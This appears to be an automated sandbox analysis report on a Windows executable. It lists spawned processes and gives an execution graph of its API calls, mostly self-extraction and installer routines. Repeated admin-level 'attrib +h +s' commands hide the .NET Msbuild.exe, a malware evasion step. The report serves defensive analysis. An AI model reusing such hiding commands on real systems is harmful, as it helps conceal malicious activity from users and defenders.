                                                                                                                    Start time:17:21:48
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:28
                                                                                                                    Start time:17:21:48
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:29
                                                                                                                    Start time:17:22:01
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:30
                                                                                                                    Start time:17:22:01
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:31
                                                                                                                    Start time:17:22:19
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:32
                                                                                                                    Start time:17:22:19
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:33
                                                                                                                    Start time:17:22:35
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:34
                                                                                                                    Start time:17:22:35
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:35
                                                                                                                    Start time:17:22:48
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:36
                                                                                                                    Start time:17:22:48
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:37
                                                                                                                    Start time:17:23:01
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:38
                                                                                                                    Start time:17:23:01
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:39
                                                                                                                    Start time:17:23:11
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:40
                                                                                                                    Start time:17:23:11
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:41
                                                                                                                    Start time:17:23:28
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:42
                                                                                                                    Start time:17:23:28
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:43
                                                                                                                    Start time:17:23:43
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:44
                                                                                                                    Start time:17:23:43
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:45
                                                                                                                    Start time:17:23:50
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:46
                                                                                                                    Start time:17:23:50
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:31.4%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:42%
                                                                                                                      Total number of Nodes:928
                                                                                                                      Total number of Limit Nodes:44
                                                                                                                      execution_graph 2984 7ff761f78417 2985 7ff761f78426 _exit 2984->2985 2986 7ff761f7842f 2984->2986 2985->2986 2987 7ff761f78438 _cexit 2986->2987 2988 7ff761f78444 2986->2988 2987->2988 2989 7ff761f733a0 2990 7ff761f733bb CallWindowProcA 2989->2990 2991 7ff761f733ac 2989->2991 2992 7ff761f733b7 2990->2992 2991->2990 2991->2992 2993 7ff761f755e0 2994 7ff761f75641 ReadFile 2993->2994 2995 7ff761f7560d 2993->2995 2994->2995 2996 7ff761f757e0 2998 7ff761f757fc 2996->2998 2999 7ff761f7581e 2996->2999 2997 7ff761f7583d SetFilePointer 2997->2998 2999->2997 2999->2998 3017 7ff761f78b30 _XcptFilter 3018 7ff761f781b0 __getmainargs 2901 7ff761f758b0 2902 7ff761f758ee 2901->2902 2903 7ff761f75904 2901->2903 2904 7ff761f758fc 2902->2904 2905 7ff761f75770 CloseHandle 2902->2905 2903->2904 2907 7ff761f75a29 2903->2907 2910 7ff761f7591a 2903->2910 2906 7ff761f78470 7 API calls 2904->2906 2905->2904 2909 7ff761f75af4 2906->2909 2908 7ff761f75a35 SetWindowTextA 2907->2908 2911 7ff761f75a4a 2907->2911 2908->2911 2910->2904 2912 7ff761f75982 DosDateTimeToFileTime 2910->2912 2911->2904 2926 7ff761f751bc GetFileAttributesA 2911->2926 2912->2904 2915 7ff761f759a3 LocalFileTimeToFileTime 2912->2915 2915->2904 2916 7ff761f759c1 SetFileTime 2915->2916 2916->2904 2918 7ff761f759e9 2916->2918 2917 7ff761f75380 29 API calls 2919 7ff761f75ab5 2917->2919 2920 7ff761f75770 CloseHandle 2918->2920 2919->2904 2921 7ff761f75ac1 2919->2921 2922 7ff761f759f2 SetFileAttributesA 2920->2922 2933 7ff761f7527c LocalAlloc 2921->2933 2922->2904 2925 7ff761f75acb 2925->2904 2927 7ff761f751de 2926->2927 2929 7ff761f7525f 2926->2929 2928 7ff761f75246 SetFileAttributesA 2927->2928 2927->2929 2930 7ff761f77ac8 28 API calls 2927->2930 2928->2929 2929->2904 2929->2917 2931 7ff761f75228 2930->2931 2931->2928 2931->2929 2932 7ff761f7523c 2931->2932 2932->2928 2934 7ff761f752aa 2933->2934 2935 7ff761f752d4 LocalAlloc 2933->2935 2936 7ff761f74dcc 24 API calls 2934->2936 2937 7ff761f752cd 2935->2937 2939 7ff761f75300 2935->2939 2936->2937 2937->2925 2940 7ff761f74dcc 24 API calls 2939->2940 2941 7ff761f75323 LocalFree 2940->2941 2941->2937 3024 7ff761f74a30 3025 7ff761f74a39 SendMessageA 3024->3025 3026 7ff761f74a50 3024->3026 3025->3026 3027 7ff761f73530 3028 7ff761f73557 3027->3028 3029 7ff761f73802 EndDialog 3027->3029 3030 7ff761f7377e GetDesktopWindow 3028->3030 3031 7ff761f73567 3028->3031 3032 7ff761f7356b 3029->3032 3033 7ff761f74c68 14 API calls 3030->3033 3031->3032 3035 7ff761f7357b 3031->3035 3036 7ff761f73635 GetDlgItemTextA 3031->3036 3034 7ff761f73795 SetWindowTextA SendDlgItemMessageA 3033->3034 3034->3032 3037 7ff761f737d8 GetDlgItem EnableWindow 3034->3037 3038 7ff761f73618 EndDialog 3035->3038 3039 7ff761f73584 3035->3039 3044 7ff761f7365e 3036->3044 3060 7ff761f736e9 3036->3060 3037->3032 3038->3032 3039->3032 3040 7ff761f73591 LoadStringA 3039->3040 3041 7ff761f735bd 3040->3041 3042 7ff761f735de 3040->3042 3047 7ff761f74dcc 24 API calls 3041->3047 3064 7ff761f74a60 LoadLibraryA 3042->3064 3043 7ff761f74dcc 24 API calls 3043->3032 3046 7ff761f73694 GetFileAttributesA 3044->3046 3044->3060 3050 7ff761f736fa 3046->3050 3051 7ff761f736a8 3046->3051 3063 7ff761f735d7 3047->3063 3049 7ff761f735eb SetDlgItemTextA 3049->3032 3049->3041 3052 7ff761f77ba8 CharPrevA 3050->3052 3053 7ff761f74dcc 24 API calls 3051->3053 3055 7ff761f7370e 3052->3055 3056 7ff761f736cb 3053->3056 3054 7ff761f7374b EndDialog 3054->3032 3057 7ff761f76b70 31 API calls 3055->3057 3056->3032 3058 7ff761f736d4 CreateDirectoryA 3056->3058 3059 7ff761f73716 3057->3059 3058->3050 3058->3060 3059->3060 3061 7ff761f73721 3059->3061 3060->3043 3062 7ff761f76ca4 38 API calls 3061->3062 3061->3063 3062->3063 3063->3032 3063->3054 3065 7ff761f74c20 3064->3065 3066 7ff761f74aa0 GetProcAddress 3064->3066 3070 7ff761f74dcc 24 API calls 3065->3070 3067 7ff761f74c0a FreeLibrary 3066->3067 3068 7ff761f74ac2 GetProcAddress 3066->3068 3067->3065 3068->3067 3069 7ff761f74ae2 GetProcAddress 3068->3069 3069->3067 3071 7ff761f74b04 3069->3071 3072 7ff761f735e3 3070->3072 3073 7ff761f74b13 GetTempPathA 3071->3073 3078 7ff761f74b65 3071->3078 3072->3032 3072->3049 3074 7ff761f74b2b 3073->3074 3074->3074 3075 7ff761f74b34 CharPrevA 3074->3075 3077 7ff761f74b4e CharPrevA 3075->3077 3075->3078 3076 7ff761f74bee FreeLibrary 3076->3072 3077->3078 3078->3076 3079 7ff761f778b0 3080 7ff761f778fd 3079->3080 3081 7ff761f77ba8 CharPrevA 3080->3081 3082 7ff761f77935 CreateFileA 3081->3082 3083 7ff761f7797e WriteFile 3082->3083 3084 7ff761f77970 3082->3084 3085 7ff761f779a2 CloseHandle 3083->3085 3087 7ff761f78470 7 API calls 3084->3087 3085->3084 3088 7ff761f779d5 3087->3088 3089 7ff761f75870 GlobalAlloc 3090 7ff761f733f0 3091 7ff761f734ec 3090->3091 3092 7ff761f73402 3090->3092 3094 7ff761f734f5 SendDlgItemMessageA 3091->3094 3097 7ff761f734e5 3091->3097 3093 7ff761f7340f 3092->3093 3095 7ff761f73441 GetDesktopWindow 3092->3095 3096 7ff761f73430 EndDialog 3093->3096 3093->3097 3094->3097 3098 7ff761f74c68 14 API calls 3095->3098 3096->3097 3099 7ff761f73458 6 API calls 3098->3099 3099->3097 2066 7ff761f78200 2085 7ff761f78964 2066->2085 2070 7ff761f7824b 2071 7ff761f7825d 2070->2071 2072 7ff761f78277 Sleep 2070->2072 2073 7ff761f7826d _amsg_exit 2071->2073 2076 7ff761f78284 2071->2076 2072->2070 2073->2076 2074 7ff761f782fc _initterm 2077 7ff761f78319 _IsNonwritableInCurrentImage 2074->2077 2075 7ff761f782dd 2076->2074 2076->2075 2076->2077 2077->2075 2078 7ff761f783f8 _ismbblead 2077->2078 2079 7ff761f7837d 2077->2079 2078->2077 2089 7ff761f72c54 GetVersion 2079->2089 2082 7ff761f783c7 exit 2083 7ff761f783cf 2082->2083 2083->2075 2084 7ff761f783d8 _cexit 2083->2084 2084->2075 2086 7ff761f78209 GetStartupInfoW 2085->2086 2087 7ff761f78990 6 API calls 2085->2087 2086->2070 2088 7ff761f78a0f 2087->2088 2088->2086 2090 7ff761f72c7b 2089->2090 2091 7ff761f72cc3 2089->2091 2090->2091 2092 7ff761f72c7f GetModuleHandleW 2090->2092 2113 7ff761f72db4 2091->2113 2092->2091 2094 7ff761f72c97 GetProcAddress 2092->2094 2094->2091 2096 7ff761f72cb2 2094->2096 2096->2091 2097 7ff761f72d7f 2099 7ff761f72d8b CloseHandle 2097->2099 2100 7ff761f72d97 2097->2100 2099->2100 2100->2082 2100->2083 2104 7ff761f72d29 2104->2097 2105 7ff761f72d5e 2104->2105 2106 7ff761f72d33 2104->2106 2109 7ff761f72d7a 2105->2109 2110 7ff761f72d67 ExitWindowsEx 2105->2110 2230 7ff761f74dcc 2106->2230 2259 7ff761f71c0c GetCurrentProcess OpenProcessToken 2109->2259 2110->2097 2114 7ff761f78b09 2113->2114 2115 7ff761f72df9 memset memset 2114->2115 2267 7ff761f75050 FindResourceA SizeofResource 2115->2267 2118 7ff761f72fb5 2122 7ff761f74dcc 24 API calls 2118->2122 2119 7ff761f72e53 CreateEventA SetEvent 2120 7ff761f75050 7 API calls 2119->2120 2121 7ff761f72e92 2120->2121 2123 7ff761f72e96 2121->2123 2124 7ff761f72ed5 2121->2124 2125 7ff761f72fa3 2121->2125 2144 7ff761f72fd9 2122->2144 2127 7ff761f74dcc 24 API calls 2123->2127 2126 7ff761f75050 7 API calls 2124->2126 2272 7ff761f770a8 2125->2272 2131 7ff761f72eec 2126->2131 2158 7ff761f72eb4 2127->2158 2131->2123 2133 7ff761f72efe CreateMutexA 2131->2133 2133->2125 2135 7ff761f72f22 GetLastError 2133->2135 2134 7ff761f72fc4 2136 7ff761f72fcd 2134->2136 2137 7ff761f72fde FindResourceExA 2134->2137 2135->2125 2138 7ff761f72f35 2135->2138 2307 7ff761f7204c 2136->2307 2140 7ff761f73014 2137->2140 2141 7ff761f72fff LoadResource 2137->2141 2142 7ff761f72f4a 2138->2142 2143 7ff761f72f62 2138->2143 2146 7ff761f7301d #17 2140->2146 2147 7ff761f73029 2140->2147 2141->2140 2145 7ff761f74dcc 24 API calls 2142->2145 2148 7ff761f74dcc 24 API calls 2143->2148 2299 7ff761f78470 2144->2299 2149 7ff761f72f60 2145->2149 2146->2147 2147->2144 2150 7ff761f7303a 2147->2150 2151 7ff761f72f7c 2148->2151 2152 7ff761f72f81 CloseHandle 2149->2152 2322 7ff761f73bf4 GetVersionExA 2150->2322 2151->2125 2151->2152 2152->2144 2158->2144 2159 7ff761f730ec 2160 7ff761f73116 2159->2160 2161 7ff761f73141 2159->2161 2162 7ff761f73134 2160->2162 2436 7ff761f760a4 2160->2436 2456 7ff761f75fe4 2161->2456 2614 7ff761f73f74 2162->2614 2167 7ff761f73236 2172 7ff761f78470 7 API calls 2167->2172 2174 7ff761f72ce1 2172->2174 2173 7ff761f7315b GetSystemDirectoryA 2175 7ff761f77ba8 CharPrevA 2173->2175 2205 7ff761f761ec 2174->2205 2176 7ff761f73186 LoadLibraryA 2175->2176 2177 7ff761f731c9 FreeLibrary 2176->2177 2178 7ff761f7319f GetProcAddress 2176->2178 2180 7ff761f73273 SetCurrentDirectoryA 2177->2180 2181 7ff761f731e4 2177->2181 2178->2177 2179 7ff761f731ba DecryptFileA 2178->2179 2179->2177 2182 7ff761f7320d 2180->2182 2189 7ff761f73291 2180->2189 2181->2180 2183 7ff761f731f0 GetWindowsDirectoryA 2181->2183 2187 7ff761f74dcc 24 API calls 2182->2187 2183->2182 2185 7ff761f7325a 2183->2185 2184 7ff761f7331f 2184->2167 2193 7ff761f72318 18 API calls 2184->2193 2197 7ff761f73347 2184->2197 2519 7ff761f76ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2185->2519 2190 7ff761f7322b 2187->2190 2189->2184 2194 7ff761f732fb 2189->2194 2195 7ff761f732cb 2189->2195 2633 7ff761f77700 GetLastError 2190->2633 2192 7ff761f73368 2192->2167 2202 7ff761f73383 2192->2202 2193->2197 2546 7ff761f75d90 2194->2546 2199 7ff761f77ac8 28 API calls 2195->2199 2196 7ff761f73230 2196->2167 2197->2192 2568 7ff761f740c4 2197->2568 2201 7ff761f732f6 2199->2201 2201->2167 2634 7ff761f7772c 2201->2634 2644 7ff761f7494c 2202->2644 2206 7ff761f76214 2205->2206 2207 7ff761f76273 2206->2207 2208 7ff761f7624c LocalFree LocalFree 2206->2208 2209 7ff761f76229 SetFileAttributesA DeleteFileA 2206->2209 2215 7ff761f762f4 SetCurrentDirectoryA 2207->2215 2216 7ff761f77c40 4 API calls 2207->2216 2218 7ff761f76311 2207->2218 2208->2206 2209->2208 2210 7ff761f76387 2211 7ff761f78470 7 API calls 2210->2211 2213 7ff761f72ce8 2211->2213 2212 7ff761f7632d RegOpenKeyExA 2212->2210 2214 7ff761f7635e RegDeleteValueA RegCloseKey 2212->2214 2213->2097 2213->2104 2219 7ff761f72318 2213->2219 2214->2210 2217 7ff761f7204c 16 API calls 2215->2217 2216->2215 2217->2218 2218->2210 2218->2212 2220 7ff761f72447 2219->2220 2221 7ff761f72330 2219->2221 2893 7ff761f72244 GetWindowsDirectoryA 2220->2893 2223 7ff761f723cb RegOpenKeyExA 2221->2223 2226 7ff761f7233a 2221->2226 2224 7ff761f723fe RegQueryInfoKeyA 2223->2224 2225 7ff761f723c3 2223->2225 2227 7ff761f723a8 RegCloseKey 2224->2227 2225->2104 2226->2225 2228 7ff761f7234a RegOpenKeyExA 2226->2228 2227->2225 2228->2225 2229 7ff761f7237d RegQueryValueExA 2228->2229 2229->2227 2231 7ff761f74e49 LoadStringA 2230->2231 2245 7ff761f75024 2230->2245 2233 7ff761f74eb5 2231->2233 2234 7ff761f74e73 2231->2234 2232 7ff761f78470 7 API calls 2235 7ff761f72d59 2232->2235 2236 7ff761f74f31 2233->2236 2244 7ff761f74ec1 LocalAlloc 2233->2244 2237 7ff761f77f04 13 API calls 2234->2237 2235->2097 2235->2105 2241 7ff761f74f8e LocalAlloc 2236->2241 2242 7ff761f74f44 LocalAlloc 2236->2242 2238 7ff761f74e78 2237->2238 2239 7ff761f74e81 MessageBoxA 2238->2239 2240 7ff761f77e34 2 API calls 2238->2240 2239->2245 2240->2239 2241->2245 2254 7ff761f74f2c 2241->2254 2242->2245 2248 7ff761f74f79 2242->2248 2244->2245 2250 7ff761f74f14 2244->2250 2245->2232 2251 7ff761f7114c _vsnprintf 2248->2251 2249 7ff761f74fbc MessageBeep 2252 7ff761f77f04 13 API calls 2249->2252 2253 7ff761f7114c _vsnprintf 2250->2253 2251->2254 2255 7ff761f74fd3 2252->2255 2253->2254 2254->2249 2256 7ff761f74fdc MessageBoxA LocalFree 2255->2256 2258 7ff761f77e34 2 API calls 2255->2258 2256->2245 2258->2256 2260 7ff761f71c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2259->2260 2262 7ff761f71c4c 2259->2262 2261 7ff761f71cec ExitWindowsEx 2260->2261 2260->2262 2261->2262 2263 7ff761f71c68 2261->2263 2264 7ff761f74dcc 24 API calls 2262->2264 2265 7ff761f78470 7 API calls 2263->2265 2264->2263 2266 7ff761f71d1a 2265->2266 2266->2097 2268 7ff761f72e43 2267->2268 2269 7ff761f7509b 2267->2269 2268->2118 2268->2119 2269->2268 2270 7ff761f750a4 FindResourceA LoadResource LockResource 2269->2270 2270->2268 2271 7ff761f750e3 memcpy_s FreeResource 2270->2271 2271->2268 2282 7ff761f77566 2272->2282 2297 7ff761f770f2 2272->2297 2273 7ff761f78470 7 API calls 2274 7ff761f72fb1 2273->2274 2274->2118 2274->2134 2275 7ff761f7711d CharNextA 2275->2297 2276 7ff761f771e7 GetModuleFileNameA 2277 7ff761f7721c 2276->2277 2278 7ff761f7720f 2276->2278 2277->2282 2364 7ff761f77d68 2278->2364 2280 7ff761f776f1 2373 7ff761f78648 RtlCaptureContext RtlLookupFunctionEntry 2280->2373 2282->2273 2283 7ff761f771ca 2283->2276 2283->2282 2285 7ff761f77238 CharUpperA 2286 7ff761f7766f 2285->2286 2285->2297 2287 7ff761f74dcc 24 API calls 2286->2287 2288 7ff761f77692 2287->2288 2289 7ff761f7769e CloseHandle 2288->2289 2290 7ff761f776aa ExitProcess 2288->2290 2289->2290 2291 7ff761f7739d CharUpperA 2291->2297 2292 7ff761f77346 CompareStringA 2292->2297 2293 7ff761f773fb CharUpperA 2293->2297 2294 7ff761f77492 CharUpperA 2294->2297 2295 7ff761f772d0 CharUpperA 2295->2297 2296 7ff761f77ce8 IsDBCSLeadByte CharNextA 2296->2297 2297->2275 2297->2280 2297->2282 2297->2283 2297->2285 2297->2291 2297->2292 2297->2293 2297->2294 2297->2295 2297->2296 2369 7ff761f77ba8 2297->2369 2300 7ff761f78479 2299->2300 2301 7ff761f784d0 RtlCaptureContext RtlLookupFunctionEntry 2300->2301 2302 7ff761f72cd4 2300->2302 2303 7ff761f78557 2301->2303 2304 7ff761f78515 RtlVirtualUnwind 2301->2304 2302->2097 2302->2159 2379 7ff761f78494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2303->2379 2304->2303 2308 7ff761f72213 2307->2308 2311 7ff761f72086 2307->2311 2309 7ff761f78470 7 API calls 2308->2309 2310 7ff761f72222 2309->2310 2310->2144 2312 7ff761f720dc FindFirstFileA 2311->2312 2312->2308 2320 7ff761f720fe 2312->2320 2313 7ff761f72138 lstrcmpA 2315 7ff761f721d9 FindNextFileA 2313->2315 2316 7ff761f72158 lstrcmpA 2313->2316 2314 7ff761f721a3 2317 7ff761f721b4 SetFileAttributesA DeleteFileA 2314->2317 2318 7ff761f721f5 FindClose RemoveDirectoryA 2315->2318 2315->2320 2316->2315 2316->2320 2317->2315 2318->2308 2319 7ff761f77ba8 CharPrevA 2319->2320 2320->2313 2320->2314 2320->2315 2320->2319 2321 7ff761f7204c 8 API calls 2320->2321 2321->2320 2327 7ff761f73c59 2322->2327 2330 7ff761f73c4f 2322->2330 2323 7ff761f74dcc 24 API calls 2324 7ff761f73f05 2323->2324 2325 7ff761f78470 7 API calls 2324->2325 2326 7ff761f73042 2325->2326 2326->2144 2337 7ff761f712ec 2326->2337 2327->2324 2329 7ff761f73db1 2327->2329 2327->2330 2380 7ff761f72834 2327->2380 2329->2324 2329->2330 2331 7ff761f73eb7 